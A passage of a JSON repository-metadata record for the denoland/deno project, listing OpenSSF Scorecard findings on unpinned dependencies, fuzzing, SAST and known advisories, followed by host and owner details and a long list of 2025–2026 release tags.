workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https: